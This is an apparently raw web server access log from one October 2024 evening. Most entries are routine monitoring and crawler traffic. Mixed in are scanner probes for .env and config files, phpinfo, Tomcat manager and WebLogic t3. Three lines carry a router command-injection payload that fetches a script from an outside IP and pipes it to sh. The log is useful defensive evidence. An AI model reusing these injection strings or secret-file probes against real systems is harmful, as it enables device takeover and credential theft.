212.91.246.72 - - [03/Oct/2024:21:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:21:34:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [03/Oct/2024:21:34:51 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [03/Oct/2024:21:35:07 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [03/Oct/2024:21:35:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.16.39.118 - - [03/Oct/2024:21:36:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
62.210.90.217 - - [03/Oct/2024:21:36:43 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
212.91.246.72 - - [03/Oct/2024:21:36:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.210.90.217 - - [03/Oct/2024:21:36:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:21:36:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:21:36:47 +0200] "GET /ads.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:21:36:47 +0200] "GET /app-ads.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
62.210.90.217 - - [03/Oct/2024:21:36:47 +0200] "GET /sellers.json HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
212.91.246.72 - - [03/Oct/2024:21:37:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:38:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:39:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.89.47.107 - - [03/Oct/2024:21:39:55 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36"
159.89.47.107 - - [03/Oct/2024:21:39:55 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/75.0.3770.103 Mobile/15E148 Safari/605.1"
212.91.246.72 - - [03/Oct/2024:21:40:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:41:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.89.47.107 - - [03/Oct/2024:21:42:01 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; SM-A530F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
159.89.47.107 - - [03/Oct/2024:21:42:06 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; Pixel 3a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
212.91.246.72 - - [03/Oct/2024:21:42:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.177 - - [03/Oct/2024:21:42:59 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1"
78.153.140.177 - - [03/Oct/2024:21:42:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.177 - - [03/Oct/2024:21:42:59 +0200] "GET /.config.yaml HTTP/1.1" 404 317 "-" "Opera/9.51 (X11; Linux i686; U; fr)"
78.153.140.177 - - [03/Oct/2024:21:43:00 +0200] "GET /.env.bak HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; ADR6400L 4G Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
78.153.140.177 - - [03/Oct/2024:21:43:00 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 OPR/44.0.2510.1159"
78.153.140.177 - - [03/Oct/2024:21:43:00 +0200] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J200G Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36"
78.153.140.177 - - [03/Oct/2024:21:43:01 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/19.0.1047.0 Safari/535.22"
78.153.140.177 - - [03/Oct/2024:21:43:01 +0200] "GET /.env.production HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; U; Linux Gentoo; pl-PL; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
78.153.140.177 - - [03/Oct/2024:21:43:01 +0200] "GET /.env.json HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36"
78.153.140.177 - - [03/Oct/2024:21:43:01 +0200] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1"
159.89.47.107 - - [03/Oct/2024:21:43:17 +0200] "GET /.env HTTP/1.1" 404 309 "-" "MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0"
152.32.252.233 - - [03/Oct/2024:21:43:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
152.32.252.233 - - [03/Oct/2024:21:43:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.32.252.233 - - [03/Oct/2024:21:43:33 +0200] "t3 12.1.2" 400 329 "-" "-"
212.91.246.72 - - [03/Oct/2024:21:43:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:21:44:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:21:44:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.89.47.107 - - [03/Oct/2024:21:45:32 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 YaBrowser/19.7.3.172 Yowser/2.5 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:21:45:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:21:46:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
152.32.140.22 - - [03/Oct/2024:21:46:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
152.32.140.22 - - [03/Oct/2024:21:46:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.32.140.22 - - [03/Oct/2024:21:46:37 +0200] "t3 12.1.2" 400 329 "-" "-"
212.91.246.72 - - [03/Oct/2024:21:46:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:47:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.89.47.107 - - [03/Oct/2024:21:47:52 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 OPR/62.0.3331.88"
157.173.122.176 - - [03/Oct/2024:21:48:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
212.91.246.72 - - [03/Oct/2024:21:48:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:49:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.89.47.107 - - [03/Oct/2024:21:49:50 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
212.91.246.72 - - [03/Oct/2024:21:50:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.89.47.107 - - [03/Oct/2024:21:51:24 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3882.0 Safari/537.36"
149.50.103.48 - - [03/Oct/2024:21:51:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:21:51:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.89.47.107 - - [03/Oct/2024:21:51:56 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
143.244.152.43 - - [03/Oct/2024:21:52:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [03/Oct/2024:21:52:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:53:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:54:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:55:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:56:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:57:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:21:58:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:21:58:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:21:59:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:22:00:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:00:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:01:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:22:02:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:02:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:03:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
58.152.85.79 - - [03/Oct/2024:22:04:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
205.210.31.75 - - [03/Oct/2024:22:04:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Oct/2024:22:04:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:06:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:07:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:08:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [03/Oct/2024:22:09:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:22:09:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:22:09:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.43.33.218 - - [03/Oct/2024:22:10:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
212.91.246.72 - - [03/Oct/2024:22:10:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:22:11:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:11:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:12:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:22:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:22:15:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:22:17:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:22:18:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:18:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:19:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:22:20:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:20:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [03/Oct/2024:22:21:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [03/Oct/2024:22:21:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:22:22:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:22:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:22:24:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:24:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.151.37.251 - - [03/Oct/2024:22:25:31 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
4.151.37.251 - - [03/Oct/2024:22:25:32 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
4.151.37.251 - - [03/Oct/2024:22:25:48 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:22:25:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.151.37.251 - - [03/Oct/2024:22:26:06 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
4.151.37.251 - - [03/Oct/2024:22:26:17 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
4.151.37.251 - - [03/Oct/2024:22:26:19 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:22:26:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.151.37.251 - - [03/Oct/2024:22:27:00 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
4.151.37.251 - - [03/Oct/2024:22:27:12 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:22:27:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.151.37.251 - - [03/Oct/2024:22:28:18 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
185.224.128.47 - - [03/Oct/2024:22:28:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.224.128.47 - - [03/Oct/2024:22:28:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:22:28:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
4.151.37.251 - - [03/Oct/2024:22:29:00 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [03/Oct/2024:22:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [03/Oct/2024:22:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:22:30:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:31:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [03/Oct/2024:22:32:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:32:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:22:33:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:33:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [03/Oct/2024:22:34:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:34:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:35:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:36:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.47 - - [03/Oct/2024:22:37:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:22:37:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.130.8 - - [03/Oct/2024:22:38:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.46 - - [03/Oct/2024:22:38:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [03/Oct/2024:22:38:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:39:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:40:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:41:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.79.17.114 - - [03/Oct/2024:22:42:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
212.91.246.72 - - [03/Oct/2024:22:42:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:43:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Oct/2024:22:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.79.27.84 - - [03/Oct/2024:22:45:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
185.224.128.67 - - [03/Oct/2024:22:46:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
34.140.251.235 - - [03/Oct/2024:22:46:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
212.91.246.72 - - [03/Oct/2024:22:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.140.58.13 - - [03/Oct/2024:22:47:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.3"
212.91.246.72 - - [03/Oct/2024:22:47:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.79 - - [03/Oct/2024:22:48:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [03/Oct/2024:22:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.67 - - [03/Oct/2024:22:49:09 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.19.99%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
